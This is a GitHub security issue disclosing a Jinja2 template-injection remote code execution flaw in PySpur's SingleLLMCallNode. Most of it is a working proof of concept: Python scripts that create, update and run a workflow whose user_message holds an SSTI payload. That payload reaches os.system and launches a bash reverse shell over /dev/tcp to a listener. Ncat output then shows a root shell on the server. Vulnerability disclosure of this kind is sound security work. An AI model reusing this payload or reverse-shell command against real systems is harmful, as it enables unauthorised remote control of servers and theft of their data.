[Security] RCE with Template of jinja2

Open Arashimu opened this issue 7 months ago • 0 comments

RCA

Some Node subclasses that inherit BaseNode have overridden the run method, but there are unsafe uses of Template in them. such as SingleLLMCallNode class

class SingleLLMCallNode(BaseNode):
    async def run(self, input: BaseModel) -> BaseModel:
        # Grab the entire dictionary from the input
        raw_input_dict = input.model_dump()

        # Render system_message
        system_message = Template(self.config.system_message).render(raw_input_dict)

        try:
            # If user_message is empty, dump the entire raw dictionary
            if not self.config.user_message.strip():
                user_message = json.dumps(raw_input_dict, indent=2)
            else:
                user_message = Template(self.config.user_message).render(**raw_input_dict)    # [1]
        except Exception as e:
            print(f"[ERROR] Failed to render user_message {self.name}")
            print(f"[ERROR] user_message: {self.config.user_message} with input: {raw_input_dict}")
            raise e

[1] self.config.user_message can be controlled by user, so this allows user to execute arbitrary code in server.

POC

create workflow

import requests

url = "http://192.168.133.128:6080/api"


def create_workflow(name, description = ""):
    request_body = {
        "name": name,
        "description": description,
    }

    rep = requests.post(f'{url}/wf', json=request_body)
    print(rep.text)

'''
{"id":"S2","name":"test1 2025-05-27 03:08:05","description":"","definition":{"nodes":[{"id":"input_node","title":"input_node","parent_id":null,"node_type":"InputNode","config":{"output_schema":{"input_1":"string"},"output_json_schema":"{\"type\": \"object\", \"properties\": {\"input_1\": {\"type\": \"string\"} } }","has_fixed_output":false,"enforce_schema":false},"coordinates":{"x":100.0,"y":100.0},"dimensions":null,"subworkflow":null}],"links":[],"test_inputs":[],"spur_type":"workflow"},"created_at":"2025-05-27T03:08:05.160335","updated_at":"2025-05-27T03:08:05.160337"}
'''

we can get the workflow id S2 2. update it

import requests

url = "http://192.168.133.128:6080/api"


body = {
    "name": "S2",
    "description": "",
    "definition": {
    "nodes": [
        {
            "id": "input_node",
            "title": "input_node",
            "parent_id": None,
            "node_type": "InputNode",
            "config": {
                "output_schema": {
                    "text": "str"
                },
                "enforce_schema": False,
                "output_json_schema": "{\n  \"type\": \"object\",\n  \"required\": [\n    \"text\"],\n  \"properties\": {\n    \"text\": {\n      \"type\": \"str\"\n    }}"
            },
            "coordinates": {
                "x": 0.0,
                "y": 280.5
            },
            "dimensions": {
                "width": 300.0,
                "height": 167.0
            },
            "subworkflow": None
        },
        {
            "id": "ContentAnalysis",
            "title": "ContentAnalysis",
            "parent_id": None,
            "node_type": "SingleLLMCallNode",
            "config": {
                "title": "ContentAnalysis",
                "type": "object",
                "output_schema": {
                    "frames": "array",
                    "musicAnalysis": "object"
                },
                "llm_info": {
                    "model": "gemini/gemini-1.5-flash",
                    "max_tokens": 8192,
                    "temperature": 0.7,
                    "top_p": 1
                },
                "system_message": "Analyze this video and provide the following:\n\n1. A list of timestamped frames at 1-second intervals, including:\n\n   - Detailed visual description of each frame\n\n   - Continuity references to previous frames when applicable\n\n   - In-depth descriptions of people (age, gender, appearance)\n\n   - Identification of text as \"text hook\" (start), \"CTA\" (end), or \"CTA\" (middle)\n\n   - Types of scene transitions used\n\n   - Presence and timing of brand elements (logos, product shots)\n\n   - Notable camera angles or movements\n\n   - Transcription of the voiceover\n\n   - Include any sound effects\n\n   - Include characteristics of the voiceover (tone, pitch, emotion)\n\n2. Music analysis:\n\n   - Presence of music (true/false)\n\n   - If true, identify the song or describe the style of music\n\nPlease format the output clearly, separating each section for easy readability.",
                "user_message": "{% for x in ().__class__.__base__.__subclasses__() %}{% if 'warning' in x.__name__ %}{{x()._module.__builtins__['__import__']('os').system('/bin/bash -c \"bash -i >& /dev/tcp/192.168.133.128/8888 0>&1\"')}}{%endif%}{% endfor %}",
                "few_shot_examples": None,
                "url_variables": {
                    "file": "input_node.video_file"
                },
                "output_json_schema": "{\n  \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n  \"title\": \"Video Analysis Schema\",\n  \"type\": \"object\",\n  \"properties\": {\n    \"frames\": {\n      \"type\": \"array\",\n      \"description\": \"List of timestamped frames at 1-second intervals\",\n      \"items\": {\n        \"type\": \"object\",\n        \"properties\": {\n          \"timestamp\": {\n            \"type\": \"integer\",\n            \"description\": \"Timestamp of the frame in seconds\"\n          },\n          \"visualDescription\": {\n            \"type\": \"string\",\n            \"description\": \"Detailed visual description of the frame\"\n          },\n          \"continuityReferences\": {\n            \"type\": \"string\",\n            \"description\": \"References to or from previous frames for continuity\"\n          },\n          \"people\": {\n            \"type\": \"array\",\n            \"description\": \"In-depth descriptions of people appearing in the frame\",\n            \"items\": {\n              \"type\": \"object\",\n              \"properties\": {\n                \"age\": {\n                  \"type\": \"string\",\n                  \"description\": \"Approximate age or age group\"\n                },\n                \"gender\": {\n                  \"type\": \"string\",\n                  \"description\": \"Observed gender presentation\"\n                },\n                \"appearance\": {\n                  \"type\": \"string\",\n                  \"description\": \"Description of clothing, hair, notable features, etc.\"\n                }\n              },\n              \"required\": [\"age\", \"gender\", \"appearance\"]\n            }\n          },\n          \"textIdentification\": {\n            \"type\": \"string\",\n            \"description\": \"Type of text on screen, if any\",\n            \"enum\": [\n              \"none\",\n              \"text hook (start)\",\n              \"CTA (middle)\",\n              \"CTA (end)\"\n            ]\n          },\n          \"sceneTransitionType\": {\n            \"type\": \"string\",\n            \"description\": \"Type of transition between scenes (e.g., cut, fade, wipe)\"\n          },\n          \"brandElements\": {\n            \"type\": \"array\",\n            \"description\": \"Any brand logos or products appearing along with their timing\",\n            \"items\": {\n              \"type\": \"object\",\n              \"properties\": {\n                \"brandElement\": {\n                  \"type\": \"string\",\n                  \"description\": \"Type of brand element (logo, product shot, etc.)\"\n                },\n                \"appearanceTime\": {\n                  \"type\": \"integer\",\n                  \"description\": \"The time (in seconds) the brand element appears\"\n                }\n              },\n              \"required\": [\"brandElement\", \"appearanceTime\"]\n            }\n          },\n          \"cameraAnglesOrMovements\": {\n            \"type\": \"string\",\n            \"description\": \"Notable camera angles or movements (e.g., close-up, panning)\"\n          },\n          \"voiceoverTranscription\": {\n            \"type\": \"string\",\n            \"description\": \"Transcribed voiceover content for this frame's time range\"\n          },\n          \"voiceoverCharacteristics\": {\n            \"type\": \"object\",\n            \"description\": \"Characteristics of the voiceover\",\n            \"properties\": {\n              \"tone\": {\n                \"type\": \"string\",\n                \"description\": \"General tone of the voiceover (e.g., friendly, dramatic)\"\n              },\n              \"pitch\": {\n                \"type\": \"string\",\n                \"description\": \"Pitch or register of the speaker’s voice\"\n              },\n              \"emotion\": {\n                \"type\": \"string\",\n                \"description\": \"Notable emotion(s) conveyed in voiceover\"\n              }\n            },\n            \"required\": [\"tone\", \"pitch\", \"emotion\"]\n          },\n          \"soundEffects\": {\n            \"type\": \"array\",\n            \"description\": \"List of any notable sound effects heard during this frame\",\n            \"items\": {\n              \"type\": \"string\"\n            }\n          }\n        },\n        \"required\": [\"timestamp\", \"visualDescription\"]\n      }\n    },\n    \"musicAnalysis\": {\n      \"type\": \"object\",\n      \"description\": \"Analysis of music presence and identification\",\n      \"properties\": {\n        \"presenceOfMusic\": {\n          \"type\": \"boolean\",\n          \"description\": \"Indicates whether music is present in the video\"\n        },\n        \"songOrStyleDescription\": {\n          \"type\": \"string\",\n          \"description\": \"If music is present, name the song or describe the style\"\n        }\n      },\n      \"required\": [\"presenceOfMusic\"]\n    }\n  },\n  \"required\": [\"frames\", \"musicAnalysis\"]\n}\n"
            },
            "coordinates": {
                "x": 438.0,
                "y": 0.0
            },
            "dimensions": {
                "width": 300.0,
                "height": 150.0
            },
            "subworkflow": None
        }
    ],
    "links": [
        {
            "source_id": "input_node",
            "target_id": "ContentAnalysis",
            "source_handle": None,
            "target_handle": None
        }
    ],
    "test_inputs": [
        {
            "id": 1738339574226,
            "text": "hello"
        }
    ]
}
}

rep = requests.put(f'{url}/wf/S2', json=body)
print(rep.text)

run the workflow

import requests

url = "http://192.168.133.128:6080/api"

request = {
    "initial_inputs": {"input_node": {"text": "hello"}}
}
rep = requests.post(f'{url}/wf/S2/run', json=request)
print(rep.text)

before running the 3th step，run the command as follow in other shell:

test@virtual-machine:~/AI/pyspur$ ncat -v -l 8888
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888

after running the 3th step, we can get a reverse shell

test@virtual-machine:~/AI/pyspur$ ncat -v -l 8888
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.25.0.3.
Ncat: Connection from 172.25.0.3:46416.
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@10e9644ec2b0:/pyspur/backend# ls
ls
alembic.ini
data
entrypoint.sh
llms-ctx.txt
log_conf.yaml
output_files
pyproject.toml
pyspur
sqlite
test_ollama.sh

May 27 '25 07:05 Arashimu